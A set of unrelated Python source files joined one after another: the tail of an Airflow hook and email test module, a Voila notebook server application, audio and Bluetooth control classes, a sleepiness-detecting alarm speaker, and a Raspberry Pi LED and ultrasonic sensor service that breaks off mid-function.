'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:[email protected]:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:[email protected]:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:[email protected]:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:[email protected]:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_subtype='mixed'
)
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.get('smtp', 'SMTP_USER'),
configuration.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.get('smtp', 'SMTP_HOST'),
configuration.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
app.py
|
#############################################################################
# Copyright (c) 2018, Voila Contributors #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
from zmq.eventloop import ioloop
import gettext
import io
import logging
import threading
import tempfile
import os
import shutil
import signal
import socket
import webbrowser
try:
from urllib.parse import urljoin
from urllib.request import pathname2url
except ImportError:
from urllib import pathname2url
from urlparse import urljoin
import jinja2
import tornado.ioloop
import tornado.web
from traitlets.config.application import Application
from traitlets import Unicode, Integer, Bool, Dict, List, default
from jupyter_server.services.kernels.kernelmanager import MappingKernelManager
from jupyter_server.services.kernels.handlers import KernelHandler, ZMQChannelsHandler
from jupyter_server.services.contents.largefilemanager import LargeFileManager
from jupyter_server.base.handlers import path_regex
from jupyter_server.utils import url_path_join
from jupyter_server.services.config import ConfigManager
from jupyter_server.base.handlers import FileFindHandler
from jupyter_core.paths import jupyter_config_path, jupyter_path
from ipython_genutils.py3compat import getcwd
from .paths import ROOT, STATIC_ROOT, collect_template_paths, notebook_path_regex
from .handler import VoilaHandler
from .treehandler import VoilaTreeHandler
from ._version import __version__
from .static_file_handler import MultiStaticFileHandler
from .configuration import VoilaConfiguration
ioloop.install()
_kernel_id_regex = r"(?P<kernel_id>\w+-\w+-\w+-\w+-\w+)"
def _(x):
return x
class Voila(Application):
name = 'voila'
version = __version__
examples = 'voila example.ipynb --port 8888'
flags = {
'no-browser': ({'Voila': {'open_browser': False}}, _('Don\'t open the notebook in a browser after startup.'))
}
description = Unicode(
"""voila [OPTIONS] NOTEBOOK_FILENAME
This launches a stand-alone server for read-only notebooks.
"""
)
option_description = Unicode(
"""
notebook_path:
File name of the Jupyter notebook to display.
"""
)
notebook_filename = Unicode()
port = Integer(
8866,
config=True,
help=_(
'Port of the voila server. Default 8866.'
)
)
autoreload = Bool(
False,
config=True,
help=_(
'Will autoreload to server and the page when a template, js file or Python code changes'
)
)
root_dir = Unicode(config=True, help=_('The directory to use for notebooks.'))
static_root = Unicode(
STATIC_ROOT,
config=True,
help=_(
'Directory holding static assets (HTML, JS and CSS files).'
)
)
aliases = {
'port': 'Voila.port',
'static': 'Voila.static_root',
'strip_sources': 'VoilaConfiguration.strip_sources',
'autoreload': 'Voila.autoreload',
'template': 'VoilaConfiguration.template',
'theme': 'VoilaConfiguration.theme',
'base_url': 'Voila.base_url',
'server_url': 'Voila.server_url',
'enable_nbextensions': 'VoilaConfiguration.enable_nbextensions'
}
classes = [
VoilaConfiguration
]
connection_dir_root = Unicode(
config=True,
help=_(
'Location of temporry connection files. Defaults '
'to system `tempfile.gettempdir()` value.'
)
)
connection_dir = Unicode()
base_url = Unicode(
'/',
config=True,
help=_(
'Path for voila API calls. If server_url is unset, this will be \
used for both the base route of the server and the client. \
If server_url is set, the server will server the routes prefixed \
by server_url, while the client will prefix by base_url (this is \
useful in reverse proxies).'
)
)
server_url = Unicode(
None,
config=True,
allow_none=True,
help=_(
'Path to prefix to voila API handlers. Leave unset to default to base_url'
)
)
notebook_path = Unicode(
None,
config=True,
allow_none=True,
help=_(
'path to notebook to serve with voila'
)
)
nbconvert_template_paths = List(
[],
config=True,
help=_(
'path to nbconvert templates'
)
)
template_paths = List(
[],
allow_none=True,
config=True,
help=_(
'path to nbconvert templates'
)
)
static_paths = List(
[STATIC_ROOT],
config=True,
help=_(
'paths to static assets'
)
)
ip = Unicode('localhost', config=True,
help=_("The IP address the notebook server will listen on."))
open_browser = Bool(True, config=True,
help=_("""Whether to open in a browser after starting.
The specific browser used is platform dependent and
determined by the python standard library `webbrowser`
module, unless it is overridden using the --browser
(NotebookApp.browser) configuration option.
"""))
browser = Unicode(u'', config=True,
help="""Specify what command to use to invoke a web
browser when opening the notebook. If not specified, the
default browser will be determined by the `webbrowser`
standard library module, which allows setting of the
BROWSER environment variable to override it.
""")
webbrowser_open_new = Integer(2, config=True,
help=_("""Specify Where to open the notebook on startup. This is the
`new` argument passed to the standard library method `webbrowser.open`.
The behaviour is not guaranteed, but depends on browser support. Valid
values are:
- 2 opens a new tab,
- 1 opens a new window,
- 0 opens in an existing window.
See the `webbrowser.open` documentation for details.
"""))
custom_display_url = Unicode(u'', config=True,
help=_("""Override URL shown to users.
Replace actual URL, including protocol, address, port and base URL,
with the given value when displaying URL to the users. Do not change
the actual connection URL. If authentication token is enabled, the
token is added to the custom URL automatically.
This option is intended to be used when the URL to display to the user
cannot be determined reliably by the Jupyter notebook server (proxified
or containerized setups for example)."""))
@property
def display_url(self):
if self.custom_display_url:
url = self.custom_display_url
if not url.endswith('/'):
url += '/'
else:
if self.ip in ('', '0.0.0.0'):
ip = "%s" % socket.gethostname()
else:
ip = self.ip
url = self._url(ip)
# TODO: do we want to have the token?
# if self.token:
# # Don't log full token if it came from config
# token = self.token if self._token_generated else '...'
# url = (url_concat(url, {'token': token})
# + '\n or '
# + url_concat(self._url('127.0.0.1'), {'token': token}))
return url
@property
def connection_url(self):
ip = self.ip if self.ip else 'localhost'
return self._url(ip)
def _url(self, ip):
# TODO: https / certfile
# proto = 'https' if self.certfile else 'http'
proto = 'http'
return "%s://%s:%i%s" % (proto, ip, self.port, self.base_url)
config_file_paths = List(
Unicode(),
config=True,
help=_(
'Paths to search for voila.(py|json)'
)
)
tornado_settings = Dict(
{},
config=True,
help=_(
'Extra settings to apply to tornado application, e.g. headers, ssl, etc'
)
)
@default('config_file_paths')
def _config_file_paths_default(self):
return [os.getcwd()] + jupyter_config_path()
@default('connection_dir_root')
def _default_connection_dir(self):
connection_dir = tempfile.gettempdir()
self.log.info('Using %s to store connection files' % connection_dir)
return connection_dir
@default('log_level')
def _default_log_level(self):
return logging.INFO
# similar to NotebookApp, except no extra path
@property
def nbextensions_path(self):
"""The path to look for Javascript notebook extensions"""
path = jupyter_path('nbextensions')
# FIXME: remove IPython nbextensions path after a migration period
try:
from IPython.paths import get_ipython_dir
except ImportError:
pass
else:
path.append(os.path.join(get_ipython_dir(), 'nbextensions'))
return path
@default('root_dir')
def _default_root_dir(self):
if self.notebook_path:
return os.path.dirname(os.path.abspath(self.notebook_path))
else:
return getcwd()
def initialize(self, argv=None):
self.log.debug("Searching path %s for config files", self.config_file_paths)
# to make config_file_paths settable via cmd line, we first need to parse it
super(Voila, self).initialize(argv)
if len(self.extra_args) == 1:
arg = self.extra_args[0]
# I am not sure why we need to check if self.notebook_path is set, can we get rid of this?
if not self.notebook_path:
if os.path.isdir(arg):
self.root_dir = arg
elif os.path.isfile(arg):
self.notebook_path = arg
else:
raise ValueError('argument is neither a file nor a directory: %r' % arg)
elif len(self.extra_args) != 0:
raise ValueError('provided more than 1 argument: %r' % self.extra_args)
# then we load the config
self.load_config_file('voila', path=self.config_file_paths)
# but that cli config has preference, so we overwrite with that
self.update_config(self.cli_config)
# common configuration options between the server extension and the application
self.voila_configuration = VoilaConfiguration(parent=self)
self.setup_template_dirs()
signal.signal(signal.SIGTERM, self._handle_signal_stop)
def setup_template_dirs(self):
if self.voila_configuration.template:
collect_template_paths(
self.nbconvert_template_paths,
self.static_paths,
self.template_paths,
self.voila_configuration.template)
self.log.debug('using template: %s', self.voila_configuration.template)
self.log.debug('nbconvert template paths:\n\t%s', '\n\t'.join(self.nbconvert_template_paths))
self.log.debug('template paths:\n\t%s', '\n\t'.join(self.template_paths))
self.log.debug('static paths:\n\t%s', '\n\t'.join(self.static_paths))
if self.notebook_path and not os.path.exists(self.notebook_path):
raise ValueError('Notebook not found: %s' % self.notebook_path)
def _handle_signal_stop(self, sig, frame):
self.log.info('Handle signal %s.' % sig)
self.ioloop.add_callback_from_signal(self.ioloop.stop)
def start(self):
self.connection_dir = tempfile.mkdtemp(
prefix='voila_',
dir=self.connection_dir_root
)
self.log.info('Storing connection files in %s.' % self.connection_dir)
self.log.info('Serving static files from %s.' % self.static_root)
self.kernel_manager = MappingKernelManager(
parent=self,
connection_dir=self.connection_dir,
allowed_message_types=[
'comm_msg',
'comm_info_request',
'kernel_info_request',
'shutdown_request'
]
)
jenv_opt = {"autoescape": True} # we might want extra options via cmd line like notebook server
env = jinja2.Environment(loader=jinja2.FileSystemLoader(self.template_paths), extensions=['jinja2.ext.i18n'], **jenv_opt)
nbui = gettext.translation('nbui', localedir=os.path.join(ROOT, 'i18n'), fallback=True)
env.install_gettext_translations(nbui, newstyle=False)
self.contents_manager = LargeFileManager(parent=self)
# we create a config manager that load both the serverconfig and nbconfig (classical notebook)
read_config_path = [os.path.join(p, 'serverconfig') for p in jupyter_config_path()]
read_config_path += [os.path.join(p, 'nbconfig') for p in jupyter_config_path()]
self.config_manager = ConfigManager(parent=self, read_config_path=read_config_path)
# default server_url to base_url
self.server_url = self.server_url or self.base_url
self.app = tornado.web.Application(
base_url=self.base_url,
server_url=self.server_url or self.base_url,
kernel_manager=self.kernel_manager,
allow_remote_access=True,
autoreload=self.autoreload,
voila_jinja2_env=env,
jinja2_env=env,
static_path='/',
server_root_dir='/',
contents_manager=self.contents_manager,
config_manager=self.config_manager
)
self.app.settings.update(self.tornado_settings)
handlers = []
handlers.extend([
(url_path_join(self.server_url, r'/api/kernels/%s' % _kernel_id_regex), KernelHandler),
(url_path_join(self.server_url, r'/api/kernels/%s/channels' % _kernel_id_regex), ZMQChannelsHandler),
(
url_path_join(self.server_url, r'/voila/static/(.*)'),
MultiStaticFileHandler,
{
'paths': self.static_paths,
'default_filename': 'index.html'
}
)
])
# Serving notebook extensions
if self.voila_configuration.enable_nbextensions:
handlers.append(
(
url_path_join(self.server_url, r'/voila/nbextensions/(.*)'),
FileFindHandler,
{
'path': self.nbextensions_path,
'no_cache_paths': ['/'], # don't cache anything in nbextensions
},
)
)
if self.notebook_path:
handlers.append((
url_path_join(self.server_url, r'/'),
VoilaHandler,
{
'notebook_path': os.path.relpath(self.notebook_path, self.root_dir),
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}
))
else:
self.log.debug('serving directory: %r', self.root_dir)
handlers.extend([
(self.server_url, VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/tree' + path_regex), VoilaTreeHandler),
(url_path_join(self.server_url, r'/voila/render' + notebook_path_regex), VoilaHandler,
{
'nbconvert_template_paths': self.nbconvert_template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
self.kernel_manager.shutdown_all()
def listen(self):
self.app.listen(self.port)
self.log.info('Voila is running at:\n%s' % self.display_url)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
system_controller.py
|
import alsaaudio
import pulsectl
import threading
from config import TEST_ENV
import pydbus
import time
class SystemController():
def __init__(self):
self.system_volume = alsaaudio.Mixer().getvolume()[0]
def get_volume(self):
return self.system_volume
def set_volume(self, vol):
th = threading.Thread(target=self.__set_system_volume, args=(vol,))
th.start()
self.system_volume = vol
def __set_system_volume(self, vol):
m = alsaaudio.Mixer()
m.setvolume(vol)
class Audioctl():
def __init__(self):
self.pulse = pulsectl.Pulse('my-client-name')
def get_audio_output_devices(self):
result = self.pulse.sink_list()
output_devices = []
for path in result:
output_devices.append({'name': path.description, 'index' : path.index, 'connected' : True})
return output_devices
def select(self, device):
result = self.pulse.sink_input_list()
for path in result:
self.pulse.sink_input_move(path.index ,device['index'])
class Bluetoothctl():
def __init__(self):
self.bluez_service = 'org.bluez'
self.adapter_path = '/org/bluez/hci0'
self.bus = pydbus.SystemBus()
self.adapter = self.bus.get(self.bluez_service, self.adapter_path)
self.mngr = self.bus.get(self.bluez_service, '/')
def get_paired_devices(self):
return self.get_devices('Paired')
def get_connected_devices(self):
return self.get_devices('Connected')
def get_devices(self, filter):
mngd_objs = self.mngr.GetManagedObjects()
paired_devices = []
for path in mngd_objs:
con_state = mngd_objs[path].get('org.bluez.Device1', {}).get(filter, False)
if con_state:
addr = mngd_objs[path].get('org.bluez.Device1', {}).get('Address')
icon = mngd_objs[path].get('org.bluez.Device1', {}).get('Icon')
connected = mngd_objs[path].get('org.bluez.Device1', {}).get('Connected')
name = ('[o] ' if connected else '[ ] ') + mngd_objs[path].get('org.bluez.Device1', {}).get('Name')
paired_devices.append({'name': name, 'mac_address' : addr, 'icon' : icon, 'connected' : connected})
return paired_devices
def toggle(self, device):
if(device['connected']):
print(device['name'] + " was connected. Disconnecting")
return self.disconnect(device['mac_address'])
else :
print(device['name'] + " was disconnected. Connecting")
return self.connect(device['mac_address'])
def disconnect(self, mac_address):
device_path = f"{self.adapter_path}/dev_{mac_address.replace(':', '_')}"
device = self.bus.get(self.bluez_service, device_path)
device.Disconnect()
def connect(self, mac_address):
device_path = f"{self.adapter_path}/dev_{mac_address.replace(':', '_')}"
device = self.bus.get(self.bluez_service, device_path)
device.Connect()
|
alarmSpeaker.py
|
""" alarmSleaker.py
Summay:
Alarm sleaker.
"""
import os
import cv2
import wave
import pyaudio
import random
import threading
from detectionSleepiness import DetectionSleepiness
class AlarmSpeaker:
""" AlarmSpeaker. """
# Sound path.
__SOUNDS_DIR = "./sounds"
def __init__(self):
""" Init constructor.
"""
self.__isRunning = False
self.__speakerThreadObj = None
self.__checkSleepinessThreadObj = None
def __del__(self):
""" Destructor.
"""
self.stopThread()
def goOff(self):
""" Go off the alarm.
"""
self.stopThread()
self.startThread()
def startThread(self):
""" Start SpeakerThread and CheckSleepinessThread.
"""
self.__isRunning = True
if self.__speakerThreadObj is None:
self.__speakerThreadObj = threading.Thread(target=self.__speakerThread)
self.__speakerThreadObj.start()
if self.__checkSleepinessThreadObj is None:
self.__checkSleepinessThreadObj = threading.Thread(target=self.__checkSleepinessThread)
self.__checkSleepinessThreadObj.start()
def stopThread(self):
""" Stop SpeakerThread and CheckSleepinessThread.
"""
self.__isRunning = False
if self.__speakerThreadObj is not None:
self.__speakerThreadObj.join()
self.__speakerThreadObj = None
if self.__checkSleepinessThreadObj is not None:
self.__checkSleepinessThreadObj.join()
self.__checkSleepinessThreadObj = None
def __checkSleepinessThread(self):
""" Check sleepiness form the camera.
"""
infApp = DetectionSleepiness()
camera = cv2.VideoCapture(0)
while self.__isRunning:
_, frame = camera.read()
if infApp.isSleepy(frame) == False:
self.__isRunning = False
def __speakerThread(self):
""" Continue to sound music until stopped status.
"""
sound = self.__SOUNDS_DIR + "/" + random.choice(os.listdir(self.__SOUNDS_DIR))
while self.__isRunning:
wf = wave.open(sound, "r")
audio = pyaudio.PyAudio()
stream = audio.open(format=audio.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
data = wf.readframes(1024)
while data != b'' and self.__isRunning:
stream.write(data)
data = wf.readframes(1024)
stream.stop_stream()
stream.close()
audio.terminate()
wf.close()
|
LedService.py
|
import argparse
import multiprocessing
import time
from rpi_ws281x import *
from LEDMEthods import *
import RPi.GPIO as GPIO
from threading import Thread
# LED strip configuration:
LED_COUNT = 120 # Number of LED pixels.
LED_PIN = 18 # GPIO pin connected to the pixels (18 uses PWM!).
# LED_PIN = 10 # GPIO pin connected to the pixels (10 uses SPI /dev/spidev0.0).
LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)
LED_DMA = 10 # DMA channel to use for generating signal (try 10)
LED_BRIGHTNESS = 255 # Set to 0 for darkest and 255 for brightest
LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)
LED_CHANNEL = 0 # set to '1' for GPIOs 13, 19, 41, 45 or 53
# threads
exitFlag = 0
mutex = multiprocessing.Lock()
class MyList:
def __init__(self):
self.firstValue = 1000
self.secondValue = 1000
self.thirdValue = 1000
def avg(self):
return (self.firstValue + self.secondValue + self.thirdValue) / 3
def nextValue(self, newValue):
self.thirdValue = self.secondValue
self.secondValue = self.firstValue
self.firstValue = newValue
def distanceProcess(GPIO_Trigger, GPIO_Echo, GPIO_Trigger2, GPIO_Echo2, eventLong, eventShort, reportTime, triggerDistance1,
triggerDistance2):
# GPIO Mode (BOARD / BCM)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(GPIO_Trigger, GPIO.OUT)
GPIO.setup(GPIO_Echo, GPIO.IN)
GPIO.setup(GPIO_Trigger2, GPIO.OUT)
GPIO.setup(GPIO_Echo2, GPIO.IN)
try:
list1 = MyList()
list2 = MyList()
while True:
# set Trigger to HIGH
GPIO.output(GPIO_Trigger2, True)
# set Trigger after 0.01ms to LOW
time.sleep(0.00001)
GPIO.output(GPIO_Trigger2, False)
StartTime2 = time.time()
StopTime2 = time.time()
# save StartTime
while GPIO.input(GPIO_Echo2) == 0:
StartTime2 = time.time()
# save time of arrival
while GPIO.input(GPIO_Echo2) == 1:
StopTime2 = time.time()
# time difference between start and arrival
